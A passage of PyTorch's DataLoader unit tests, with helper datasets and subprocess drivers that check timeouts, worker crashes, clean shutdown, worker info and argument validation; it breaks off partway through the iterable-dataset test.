# Inspired by https://stackoverflow.com/a/26703365
# If all workers will call `sync_once`, they will be blocked until all workers
# reach the call (i.e., acting like a barrier).
# This can be used to ensure that each worker at least processes one data.
class SynchronizedDataset(Dataset):
    """Abstract dataset whose sync_once() is a barrier across num_workers
    processes, guaranteeing every worker serves at least one item."""

    def __init__(self, size, batch_size, num_workers):
        assert size >= num_workers * batch_size
        self.num_workers = num_workers
        self.size = size
        # Shared counter of workers that reached the barrier.
        self.count = mp.Value('i', 0, lock=True)
        # Released once by the last arriving worker, then passed along.
        self.barrier = mp.Semaphore(0)

    def sync_once(self):
        """Block until all num_workers processes have called this once."""
        with self.count.get_lock():
            self.count.value += 1
            if self.count.value == self.num_workers:
                self.barrier.release()
        # Each waiter takes the token and hands it to the next one.
        self.barrier.acquire()
        self.barrier.release()

    def __getitem__(self, index):
        raise NotImplementedError

    def __len__(self):
        return self.size
class EmptyTensorDataset(torch.utils.data.Dataset):
def __init__(self, len):
self.len = len
def __len__(self):
return self.len
def __getitem__(self, any):
return torch.empty(0)
class SynchronizedSeedDataset(SynchronizedDataset):
    """SynchronizedDataset whose items are the worker's torch RNG seed;
    the barrier ensures every worker serves at least one item."""

    def __getitem__(self, index):
        self.sync_once()
        return torch.initial_seed()
def _test_timeout(persistent_workers):
    """Provoke a DataLoader timeout: workers sleep 3s, but timeout is 1s."""
    loader = DataLoader(SleepDataset(10, 3), batch_size=2, num_workers=2,
                        timeout=1, persistent_workers=persistent_workers)
    _ = next(iter(loader))
def _test_timeout_pin_memory(persistent_workers):
    """Same as _test_timeout, but with the pin_memory thread in the loop."""
    loader = DataLoader(SleepDataset(10, 3), batch_size=2, num_workers=2,
                        timeout=1, pin_memory=True,
                        persistent_workers=persistent_workers)
    _ = next(iter(loader))
def _test_large_sampler_indices(persistent_workers):
    """Stream huge index batches through a worker, then raise on purpose.

    See test_large_sampler_indices and
    https://github.com/pytorch/pytorch/issues/48666
    """
    loader = torch.utils.data.DataLoader(
        EmptyTensorDataset(10000000),
        batch_size=40960,
        persistent_workers=persistent_workers,
        num_workers=1)
    for batch in iter(loader):
        assert batch.numel() == 0
    raise RuntimeError('My Error')
def disable_stderr(worker_id):
    r"""
    Avoids printing "ERROR: Unexpected segmentation fault encountered in worker."
    from workers. Since worker signal handler prints with low-level write(),
    this has to be done on OS level via dup.
    This is used as worker_init_fn for test_segfault.
    """
    sys.stderr.flush()  # flush library buffers that dup2 knows nothing about
    # Closing `devnull` when the with-block exits is safe: dup2 duplicates
    # the descriptor, so fd 2 keeps pointing at /dev/null afterwards.
    with open(os.devnull, 'w') as devnull:
        os.dup2(devnull.fileno(), sys.stderr.fileno())
def _test_segfault():
    # SegfaultDataset presumably crashes inside __getitem__ (TODO confirm);
    # stderr noise from the dying worker is silenced via disable_stderr so the
    # parent test only sees the DataLoader-side error.  Run in a subprocess.
    dataset = SegfaultDataset(10)
    dataloader = DataLoader(dataset, batch_size=2, num_workers=2, worker_init_fn=disable_stderr)
    _ = next(iter(dataloader))
def _test_no_segfault():
    """Regression driver for pytorch/pytorch#54752: forked workers must not crash."""
    dataset = [1, 2, 3]
    # Ensure the parent runs with at least 4 threads before forking; this is
    # the condition that used to trigger the segfault.
    torch.set_num_threads(max(torch.get_num_threads(), 4))
    fork_ctx = torch.multiprocessing.get_context(method='fork')
    loader = DataLoader(dataset, num_workers=1, worker_init_fn=disable_stderr,
                        multiprocessing_context=fork_ctx)
    _ = next(iter(loader))
class TestProperExitDataset(Dataset):
    """Map-style dataset whose *last* worker raises once ``error_event`` is set."""
    def __init__(self, size, error_event):
        self.size = size
        self.error_event = error_event
    def __len__(self):
        return self.size
    def __getitem__(self, idx):
        info = torch.utils.data.get_worker_info()
        # Short-circuits before touching ``info`` when no event was given
        # (e.g. when indexed from the main process, where info is None).
        should_raise = (
            self.error_event is not None
            and self.error_event.is_set()
            and info.id == info.num_workers - 1
        )
        if should_raise:
            # only error in the last worker
            raise RuntimeError('Worker error')
        return torch.tensor([idx])
class TestProperExitIterableDataset(IterableDataset):
    """Iterable dataset yielding ``size`` items; the *last* worker raises once ``error_event`` is set."""
    def __init__(self, size, error_event):
        self.error_event = error_event
        self.size = size
        self.remaining = size  # items left before this iterator is exhausted
    def __len__(self):
        return self.size
    def __iter__(self):
        return self
    def __next__(self):
        info = torch.utils.data.get_worker_info()
        # Short-circuits before touching ``info`` when no event was given.
        should_raise = (
            self.error_event is not None
            and self.error_event.is_set()
            and info.id == info.num_workers - 1
        )
        if should_raise:
            # only error in the last worker
            raise RuntimeError('Worker error')
        self.remaining -= 1
        if self.remaining < 0:
            raise StopIteration
        return torch.tensor(-1000)
    next = __next__  # py2 compatibility
# See TestDataLoader.test_proper_exit for usage
def _test_proper_exit(is_iterable_dataset, use_workers, pin_memory, exit_method,
                      hold_iter_reference, loader_setup_event, tester_setup_event,
                      persistent_workers):
    r"""Drive a DataLoader into an abnormal exit so the parent test can observe it.

    ``exit_method`` is one of None, 'loader_error', 'loader_kill',
    'worker_error', 'worker_kill'.  ``loader_setup_event`` and
    ``tester_setup_event`` rendezvous with the controlling test
    (see TestDataLoader.test_proper_exit for usage).
    """
    num_workers = 2 if use_workers else 0
    if exit_method == 'worker_error' or exit_method == 'worker_kill':
        assert use_workers is True
    if exit_method == 'worker_error':
        worker_error_event = mp.Event()
    else:
        worker_error_event = None
    if is_iterable_dataset:
        ds = TestProperExitIterableDataset(7, worker_error_event)
    else:
        ds = TestProperExitDataset(12, worker_error_event)
    loader = DataLoader(ds, batch_size=1, shuffle=False,
                        num_workers=num_workers, pin_memory=pin_memory,
                        worker_init_fn=set_faulthander_if_available,
                        persistent_workers=persistent_workers)
    error_it = 2
    if use_workers:
        # 2 is the magical per-worker prefetch number...
        # FIXME: change this after the number becomes configurable.
        # The dataset must be big enough that iteration is still in flight
        # (prefetch included) when the error/kill is triggered at error_it.
        if is_iterable_dataset:
            assert len(ds) * num_workers > (error_it + 2 + 1)
        else:
            assert len(loader) > (error_it + 2 + 1) * num_workers
    else:
        if is_iterable_dataset:
            assert len(ds) > error_it + 1
        else:
            assert len(loader) > error_it + 1
    it = iter(loader)
    if use_workers:
        workers = it._workers
    def kill_pid(pid):
        # Hard-kill ``pid`` and verify it is really gone.
        psutil_p = psutil.Process(pid)
        psutil_p.kill()
        psutil_p.wait(JOIN_TIMEOUT)
        assert not psutil_p.is_running()
    for i, _ in enumerate(it):
        if i == 0:
            # The for-loop above still holds a reference to ``it``, so deleting
            # the names here only drops the *extra* references.
            if not hold_iter_reference:
                del it
                del loader
            loader_setup_event.set()
            tester_setup_event.wait()
            # ensure that the workers are still alive
            if use_workers:
                for w in workers:
                    assert w.is_alive()
            if worker_error_event is not None:
                worker_error_event.set()
        if i == error_it:
            if exit_method == 'loader_error':
                raise RuntimeError('Loader error')
            elif exit_method == 'loader_kill':
                kill_pid(os.getpid())
            elif exit_method == 'worker_kill':
                kill_pid(workers[-1].pid)  # kill last worker
    if not hold_iter_reference:
        # Tries to trigger the __del__ clean-up rather than the automatic
        # exiting of daemonic children. Technically it should be automatically
        # triggered, but I don't want to rely on the implementation detail of
        # Python gc.
        gc.collect()
class TestWorkerInfoDataset(SynchronizedDataset):
    """Items come from ``self.value``, which only exists on worker-side copies
    (it is set by _test_worker_info_init_fn); indexing the main-process copy
    raises AttributeError."""
    def __getitem__(self, idx):
        # Barrier: every worker serves at least one item.
        self.sync_once()
        return torch.tensor(self.value)
# Should be used as worker_init_fn with TestWorkerInfoDataset.
# See _test_get_worker_info below for usage.
def _test_worker_info_init_fn(worker_id):
    """worker_init_fn asserting get_worker_info() is consistent and read-only.

    Used together with TestWorkerInfoDataset; leaves ``[worker_id, pid]`` on the
    worker's dataset copy so the main process can verify it afterwards
    (see _test_get_worker_info).
    """
    worker_info = torch.utils.data.get_worker_info()
    assert worker_id == worker_info.id, "worker_init_fn and worker_info should have consistent id"
    assert worker_id < worker_info.num_workers, "worker_init_fn and worker_info should have valid id"
    assert worker_info.seed == torch.initial_seed(), "worker_init_fn and worker_info should have consistent seed"
    dataset = worker_info.dataset
    assert isinstance(dataset, TestWorkerInfoDataset), "worker_info should have correct dataset copy"
    assert not hasattr(dataset, 'value'), "worker_info should have correct dataset copy"
    # test that WorkerInfo attributes are read-only
    try:
        worker_info.id = 3999
    except RuntimeError as e:
        assert str(e) == "Cannot assign attributes to WorkerInfo objects"
    else:
        # Fix: previously the check passed silently when no exception was raised.
        raise AssertionError("assigning to an existing WorkerInfo attribute should raise RuntimeError")
    try:
        worker_info.a = 3
    except RuntimeError as e:
        assert str(e) == "Cannot assign attributes to WorkerInfo objects"
    else:
        raise AssertionError("assigning a new WorkerInfo attribute should raise RuntimeError")
    for k in ['id', 'num_workers', 'seed', 'dataset']:
        assert "{}=".format(k) in repr(worker_info)
    # Marker for the main process: set only on this worker's dataset copy.
    dataset.value = [worker_id, os.getpid()]
def _test_get_worker_info():
    """Check get_worker_info(): None in the main process, populated in workers.

    Run in a subprocess by TestDataLoader.test_get_worker_info; communicates
    failure via assert (non-zero exit code).
    """
    # get_worker_info returns None in main proc
    assert torch.utils.data.get_worker_info() is None
    num_workers = 2
    batch_size = 2
    dataset = TestWorkerInfoDataset(6, batch_size, num_workers)
    dataloader = DataLoader(dataset, batch_size=batch_size,
                            num_workers=num_workers,
                            worker_init_fn=_test_worker_info_init_fn)
    it = iter(dataloader)
    data = []
    for d in it:
        data.append(d)
    worker_pids = [w.pid for w in it._workers]
    data = torch.cat(data, 0)
    for d in data:
        # each `d` is a [worker_id, worker_pid] pair, which is set in
        # _test_worker_info_init_fn
        assert d[1] == worker_pids[d[0]]
    # get_worker_info returns None in main proc after data loading
    assert torch.utils.data.get_worker_info() is None
    # main proc dataset was never assigned this attribute
    assert not hasattr(dataset, 'value')
    # Indexing the main-process copy must fail, since ``value`` was only ever
    # set on the workers' dataset copies.
    try:
        _ = dataset[0]
    except AttributeError:
        return
    raise RuntimeError('Expected AttributeError')
# test custom init function
def init_fn(worker_id):
    # Pin every worker's RNG to a fixed seed so loaded values are deterministic
    # (checked by test_worker_init_fn).
    torch.manual_seed(12345)
# used with test_error_in_init
class ErrorIterableDataset(IterableDataset):
    """Iterable dataset whose iterator creation always fails (see test_error_in_init)."""
    def __iter__(self):
        raise RuntimeError("Error in __iter__")
# used with test_error_in_init
def error_worker_init_fn(_):
    # Always fails; verifies worker_init_fn errors propagate (test_error_in_init).
    raise RuntimeError("Error in worker_init_fn")
class BulkLoadingDataset(Dataset):
    """Map-style dataset fetched with a whole *batch* of indices at once.

    ``__getitem__`` receives a list/tuple of indices (as produced by
    BulkLoadingSampler) and returns them packed into a single tensor.
    """
    def __init__(self, length):
        self.length = length
    def __len__(self):
        return self.length
    def __getitem__(self, indices):
        # Bulk loading: the "key" is a collection of indices, not a single int.
        assert isinstance(indices, (list, tuple))
        return torch.as_tensor(indices)
class BulkLoadingSampler(torch.utils.data.Sampler):
    """Sampler yielding whole lists of shuffled indices for bulk fetching."""
    def __init__(self, dataset, batch_size):
        self.dataset = dataset
        self.batch_size = batch_size
    def __iter__(self):
        permutation = torch.randperm(len(self.dataset))
        for chunk in permutation.split(self.batch_size):
            yield chunk.tolist()
    def __len__(self):
        # Number of chunks, counting the final partial one.
        return int(math.ceil(len(self.dataset) / float(self.batch_size)))
class CustomList(list):
    # Marker subclass of ``list``; presumably used to check that collation
    # preserves user container subclasses — verify against its test usage.
    pass
class CustomDict(dict):
    # Marker subclass of ``dict``; presumably used to check that collation
    # preserves user container subclasses — verify against its test usage.
    pass
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoader(TestCase):
def setUp(self):
super(TestDataLoader, self).setUp()
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
self.persistent_workers = False
def _get_data_loader(self, dataset, **kwargs):
persistent_workers = kwargs.get('persistent_workers', self.persistent_workers)
if persistent_workers and kwargs.get('num_workers', 0) == 0:
persistent_workers = False
kwargs['persistent_workers'] = persistent_workers
return DataLoader(dataset, **kwargs)
def _test_sequential(self, loader):
batch_size = loader.batch_size
if batch_size is None:
for idx, (sample, target) in enumerate(loader):
self.assertEqual(sample, self.data[idx])
self.assertEqual(target, self.labels[idx])
self.assertEqual(idx, len(self.dataset) - 1)
else:
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
    def _test_shuffle(self, loader):
        """Assert ``loader`` yields every (sample, target) pair exactly once.

        Each yielded sample is matched back to its row in ``self.data``;
        relies on the randn rows being pairwise distinct.  Note that
        ``data_point_idx`` deliberately leaks out of the inner search loop
        after ``break`` and is reused for the label check.
        """
        found_data = {i: 0 for i in range(self.data.size(0))}
        found_labels = {i: 0 for i in range(self.labels.size(0))}
        batch_size = loader.batch_size
        if batch_size is None:
            for i, (batch_samples, batch_targets) in enumerate(loader):
                sample, target = (batch_samples, batch_targets)
                for data_point_idx, data_point in enumerate(self.data):
                    if data_point.eq(sample).all():
                        self.assertFalse(found_data[data_point_idx])
                        found_data[data_point_idx] += 1
                        break
                self.assertEqual(target, self.labels[data_point_idx])
                found_labels[data_point_idx] += 1
                self.assertEqual(sum(found_data.values()), (i + 1))
                self.assertEqual(sum(found_labels.values()), (i + 1))
            self.assertEqual(i, (len(self.dataset) - 1))
        else:
            for i, (batch_samples, batch_targets) in enumerate(loader):
                for sample, target in zip(batch_samples, batch_targets):
                    for data_point_idx, data_point in enumerate(self.data):
                        if data_point.eq(sample).all():
                            self.assertFalse(found_data[data_point_idx])
                            found_data[data_point_idx] += 1
                            break
                    self.assertEqual(target, self.labels[data_point_idx])
                    found_labels[data_point_idx] += 1
                self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
                self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
            self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_error_in_init(self):
for num_workers in [0, 2]:
loader = self._get_data_loader(ErrorIterableDataset(), num_workers=num_workers)
with self.assertRaisesRegex(RuntimeError, 'Error in __iter__'):
list(iter(loader))
loader = self._get_data_loader(self.dataset, num_workers=2, worker_init_fn=error_worker_init_fn)
with self.assertRaisesRegex(RuntimeError, 'Error in worker_init_fn'):
list(iter(loader))
    def test_typing(self):
        """Subscripting Dataset/DataLoader generics must not raise at class/def time."""
        from typing import List
        # Make sure there is no TypeError
        class SomeDatasetClass(Dataset[List[torch.Tensor]]):
            pass
        def _create_dataloader(is_train: bool) -> DataLoader[List[torch.Tensor]]:
            pass
    @unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
    @unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
    def test_fd_limit_exceeded(self):
        """Exceeding RLIMIT_NOFILE while sharing tensors must yield a helpful error."""
        # See NOTE [ DataLoader on Linux and open files limit ]
        # The scenario runs in a fresh interpreter so the lowered fd limit
        # cannot leak into other tests.
        import subprocess
        subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
    def __init__(self, len, size):
        super(RandomDataset).__init__()
        self.len = len
        self.size = size
    def __iter__(self):
        return self
    def __next__(self):
        if self.len <= 0:
            raise StopIteration
        self.len -= 1
        return torch.randn(self.size)
try:
    keep_fds_alive = []
    resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
    for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
                               num_workers=1):
        random_t.max(dim=0)
        keep_fds_alive.append(random_t)
except RuntimeError as e:
    assert "ulimit -n" in str(e)
    assert "set_sharing_strategy" in str(e)
"""])
def test_invalid_assign_after_init(self):
dl = self._get_data_loader(self.dataset)
for attr in ('batch_size', 'sampler', 'batch_sampler', 'drop_last', 'dataset'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential_nonbatch(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=None))
def test_sequential_batch(self):
self._test_sequential(self._get_data_loader(self.dataset))
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2))
def test_bulk_loading_nobatch(self):
n = 35
bs = 4
ds = BulkLoadingDataset(n)
sampler = BulkLoadingSampler(ds, batch_size=4)
for num_workers in [0, 4]:
dl = self._get_data_loader(ds, num_workers=num_workers, batch_size=None, sampler=sampler, pin_memory=TEST_CUDA)
self.assertFalse(dl._auto_collation)
samples = list(dl)
self.assertEqual(samples[0].is_pinned(), TEST_CUDA)
self.assertEqual(set(torch.cat(samples, 0).tolist()), set(range(n)))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = self._get_data_loader(dataset, shuffle=False)
dataloader_shuffle = self._get_data_loader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_sequential_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
def test_multiple_dataloaders(self):
for multiprocessing_context in supported_multiprocessing_contexts:
loader1_it = iter(self._get_data_loader(self.dataset, num_workers=1))
loader2_it = iter(self._get_data_loader(self.dataset, num_workers=2, multiprocessing_context=multiprocessing_context))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
# Tests if the child process forked by the DataLoader segfaults due to having more than 3 threads
# in the parent process after at least one set_num_threads invocation in the parent process.
# After forking, set_num_threads(1) in the child process entails handling some inherited data-structures
# of the Caffe2 thread-pool of the parent process, culminating in a segfault.
# Reference: https://github.com/pytorch/pytorch/issues/54752
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_no_segfault(self):
p = ErrorTrackingProcess(target=_test_no_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
if p.exception:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
self.fail("Segfault occurred in worker process after fork")
finally:
p.terminate()
def test_timeout(self):
if TEST_CUDA and not NO_MULTIPROCESSING_SPAWN:
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# _test_timeout_pin_memory with pin_memory=True initializes CUDA when the iterator is
# constructed.
targets = (_test_timeout, _test_timeout_pin_memory)
else:
targets = (_test_timeout,)
for target in targets:
p = ErrorTrackingProcess(target=target, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_large_sampler_indices(self):
# Test that the data loader cleanly exit when the process errors
# 1. having an reference to the iterator
# 2. using a sampler that yields big elements s.t. _index_queues putters block
#
# More context: https://github.com/pytorch/pytorch/issues/48666
p = ErrorTrackingProcess(target=_test_large_sampler_indices, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'My Error')
finally:
p.terminate()
    def test_invalid_ctor_args_combinations(self):
        """The constructor must reject incompatible argument combinations
        for generic, map-style, and iterable-style datasets alike."""
        # general
        with self.assertRaisesRegex(ValueError, "num_workers option should be non-negative"):
            self._get_data_loader(self.dataset, num_workers=-1)
        with self.assertRaisesRegex(ValueError, "timeout option should be non-negative"):
            self._get_data_loader(self.dataset, timeout=-1)
        # disable auto-batching
        with self.assertRaisesRegex(ValueError,
                                    "batch_size=None option disables auto-batching and is mutually exclusive"):
            self._get_data_loader(self.dataset, batch_size=None, drop_last=True)
        # multiprocessing_context is only meaningful with worker processes
        valid_ctx = list(torch.multiprocessing.get_all_start_methods())[-1]
        with self.assertRaisesRegex(ValueError, r"multi-process loading \(num_workers > 0\), but got"):
            self._get_data_loader(self.dataset, num_workers=0, multiprocessing_context=valid_ctx)
        with self.assertRaisesRegex(ValueError, "should specify a valid start method in"):
            self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context='bad')
        with self.assertRaisesRegex(TypeError, "multiprocessing_context option should be a valid context "):
            self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context=object())
        # map-style
        sampler = torch.utils.data.SequentialSampler(self.dataset)
        batch_sampler = torch.utils.data.BatchSampler(sampler, 3, False)
        with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
            self._get_data_loader(self.dataset, batch_size=11, sampler=sampler, shuffle=True)
        with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
            self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=True)
        with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
            self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=3)
        with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
            self._get_data_loader(self.dataset, batch_size=11, batch_sampler=batch_sampler)
        with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
            self._get_data_loader(self.dataset, shuffle=True, batch_sampler=batch_sampler)
        with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
            self._get_data_loader(self.dataset, drop_last=True, batch_sampler=batch_sampler)
        with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
            self._get_data_loader(self.dataset, drop_last=3, batch_sampler=batch_sampler)
        # iterable-style
        dataset = CountingIterableDataset(20)
        with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
            self._get_data_loader(dataset, shuffle=True)
        with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
            self._get_data_loader(dataset, shuffle=3)
        with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
            self._get_data_loader(dataset, sampler=torch.utils.data.SequentialSampler(dataset))
        with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
            self._get_data_loader(dataset, sampler=3)
        with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
            self._get_data_loader(dataset, batch_sampler=torch.utils.data.BatchSampler(
                torch.utils.data.SequentialSampler(dataset), 3, False))
        with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
            self._get_data_loader(dataset, batch_sampler=3)
def test_builtin_collection_conversion(self):
for coll_ty in (list, tuple):
for num_workers in (0, 1):
# map-style dataset
dataset = CountingDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
# iterable-style dataset
dataset = CountingIterableDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
# this IterableDataset isn't configured for each worker, so for
# the equality test below to be valid, we cannot have more than 1 workers.
assert num_workers in [0, 1], "invalid test"
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
    def test_iterable_style_dataset(self):
        """End-to-end checks for IterableDataset loading.

        Covers single-process and multiprocessing loading, with and without
        auto-batching, drop_last handling, the __len__ warning semantics, and
        graceful worker shutdown.
        """
        # [no auto-batching] single process loading
        dataset = CountingIterableDataset(20)
        dataloader = self._get_data_loader(dataset, batch_size=None)
        fetched = list(dataloader)
        self.assertEqual(len(fetched), 20)
        for i, d in enumerate(fetched):
            # non-batched should not convert ints into tensors
            self.assertIsInstance(d, int)
            self.assertEqual(d, i)
        # DataLoader should match len of the iterable-style dataset (if implemented)
        self.assertEqual(len(dataloader), len(dataset))
        # [no auto-batching] multiprocessing loading
        num_workers = 3
        sizes_for_all_workers = [0, 4, 20]
        expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
        assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
        for prefetch_factor in [2, 3, 4]:
            dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
            dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=None,
                                               worker_init_fn=set_faulthander_if_available,
                                               prefetch_factor=prefetch_factor)
            dataloader_iter = iter(dataloader)
            # Ordering across workers is nondeterministic; compare sorted.
            fetched = sorted(dataloader_iter)
            for a, b in zip(fetched, expected):
                # non-batched should not convert ints into tensors
                self.assertIsInstance(a, int)
                self.assertEqual(a, b)
            # DataLoader should match len of the iterable-style dataset (if implemented)
            self.assertEqual(len(dataloader), len(dataset))
            # When loading more than len(dataset) data, after accessing len(dataloader),
            # we should get a warning. See NOTE [ IterableDataset and __len__ ].
            dataset = CountingIterableDataset(20)
            dataloader = self._get_data_loader(dataset, num_workers=num_workers,
                                               worker_init_fn=set_faulthander_if_available,
                                               prefetch_factor=prefetch_factor)
            it = iter(dataloader)
            for _ in range(40):
                self.assertNotWarn(lambda: next(it), "Should not warn before accessing len(dataloader)")
            self.assertEqual(len(dataloader), len(dataset))
            self.assertEqual(len(dataloader), 20)
            it = iter(dataloader)
            for _ in range(20):
                self.assertNotWarn(lambda: next(it), "Should not warn before exceeding length")
            for _ in range(3):
                with self.assertWarnsRegex(
                        UserWarning,
                        r"but [0-9]+ samples have been fetched\. For multiprocessing data-loading, this",
                        msg="Should always warn after exceeding length"):
                    next(it)
        # [no auto-batching] test that workers exit gracefully
        workers = dataloader_iter._workers
        del dataloader_iter
        del dataloader
        try:
            for w in workers:
                w.join(JOIN_TIMEOUT)
                self.assertFalse(w.is_alive())
                self.assertEqual(w.exitcode, 0)
        finally:
            for w in workers:
                w.terminate()
        # [auto-batching] single process loading
        dataset = CountingIterableDataset(20)
        fetched = list(self._get_data_loader(dataset, batch_size=7))
        self.assertEqual(len(fetched), 3)
        self.assertEqual(fetched[0].tolist(), list(range(7)))
        self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
        self.assertEqual(fetched[2].tolist(), list(range(14, 20)))
        # [auto-batching] multiprocessing loading
        num_workers = 3
        sizes_for_all_workers = [0, 4, 20]
        expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
        assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
        for prefetch_factor in [2, 3, 4]:
            dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
            # worker 0 should return 0 batches
            # worker 1 should return 1 batches
            # worker 2 should return 3 batches
            dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, prefetch_factor=prefetch_factor)
            dataloader_iter = iter(dataloader)
            fetched = list(dataloader_iter)
            self.assertEqual(len(fetched), 4)
            fetched = set(tuple(t.tolist()) for t in fetched)
            self.assertEqual(fetched, {tuple(range(4)), tuple(range(7)), tuple(range(7, 14)), tuple(range(14, 20))})
        # [auto-batching] test that workers exit gracefully
        workers = dataloader_iter._workers
        del dataloader_iter
        del dataloader
        try:
            for w in workers:
                w.join(JOIN_TIMEOUT)
                self.assertFalse(w.is_alive())
                self.assertEqual(w.exitcode, 0)
        finally:
            for w in workers:
                w.terminate()
        # [auto-batching & drop_last] single process loading
        dataset = CountingIterableDataset(20)
        fetched = list(self._get_data_loader(dataset, batch_size=7, drop_last=True))
        self.assertEqual(len(fetched), 2)
        self.assertEqual(fetched[0].tolist(), list(range(7)))
        self.assertEqual(fetched[1].tolist(), list(range(7, 14)))
        # [auto-batching & drop_last] multiprocessing loading
        num_workers = 3
        sizes_for_all_workers = [0, 4, 20]
        expected = sorted(sum((list(range(s)) for s in sizes_for_all_workers), []))
        assert len(sizes_for_all_workers) == num_workers, 'invalid test case'
        for prefetch_factor in [2, 3, 4]:
            dataset = WorkerSpecificIterableDataset(sizes_for_all_workers)
            # worker 0 should return 0 batches
            # worker 1 should return 1 batches
            # worker 2 should return 3 batches
            dataloader = self._get_data_loader(dataset, num_workers=num_workers, batch_size=7, drop_last=True,
                                               worker_init_fn=set_faulthander_if_available,
                                               prefetch_factor=prefetch_factor)
            dataloader_iter = iter(dataloader)
            fetched = list(dataloader_iter)
            self.assertEqual(len(fetched), 2)
            fetched = set(tuple(t.tolist()) for t in fetched)
